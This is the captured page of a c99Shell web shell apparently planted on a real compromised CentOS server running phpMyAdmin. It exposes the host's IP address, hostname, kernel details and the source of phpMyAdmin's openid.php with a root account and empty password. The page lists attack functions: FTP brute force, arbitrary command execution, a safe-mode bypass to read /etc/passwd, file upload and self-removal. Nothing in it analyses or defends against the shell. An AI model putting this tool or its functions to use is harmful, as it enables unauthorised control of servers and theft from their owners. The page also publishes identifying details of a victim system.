110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/scripts/ drwxr-xr-x Free 40.64 GB of 127.8 GB (31.8%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/scripts/ drwxr-xr-x
Free 40.64 GB of 127.8 GB (31.8%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: openid.php (4.35 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

array( 'user' => 'root', 'password' => '', ), ); /** * Simple function to show HTML page with given content. */ function show_page($contents) { header('Content-Type: text/html; charset=utf-8'); echo '' . "\n"; ?> phpMyAdmin OpenID signon example ' . $_SESSION['PMA_single_signon_message'] . '

'; unset($_SESSION['PMA_single_signon_message']); } echo $contents; ?> OpenID:
'; show_page($content); exit; } /* Grab identifier */ if (isset($_POST['identifier'])) { $identifier = $_POST['identifier']; } else if (isset($_SESSION['identifier'])) { $identifier = $_SESSION['identifier']; } else { $identifier = null; } /* Create OpenID object */ try { $o = new OpenID_RelyingParty($returnTo, $realm, $identifier); } catch (OpenID_Exception $e) { $contents = "

\n"; $contents .= "

" . $e->getMessage() . "

\n"; $contents .= "

"; show_page($contents); exit; } /* Redirect to OpenID provider */ if (isset($_POST['start'])) { try { $authRequest = $o->prepare(); } catch (OpenID_Exception $e) { $contents = "

\n"; $contents .= "

" . $e->getMessage() . "

\n"; $contents .= "

"; show_page($contents); exit; } $url = $authRequest->getAuthorizeURL(); header("Location: $url"); exit; } else { /* Grab query string */ if (!count($_POST)) { list(, $queryString) = explode('?', $_SERVER['REQUEST_URI']); } else { // I hate php sometimes $queryString = file_get_contents('php://input'); } /* Check reply */ $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP); $id = $message->get('openid.claimed_id'); if (!empty($id) && isset($AUTH_MAP[$id])) { $_SESSION['PMA_single_signon_user'] = $AUTH_MAP[$id]['user']; $_SESSION['PMA_single_signon_password'] = $AUTH_MAP[$id]['password']; session_write_close(); /* Redirect to phpMyAdmin (should use absolute URL here!) */ header('Location: ../index.php'); } else { show_page('

User not allowed!

'); exit; } }

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0132 ]--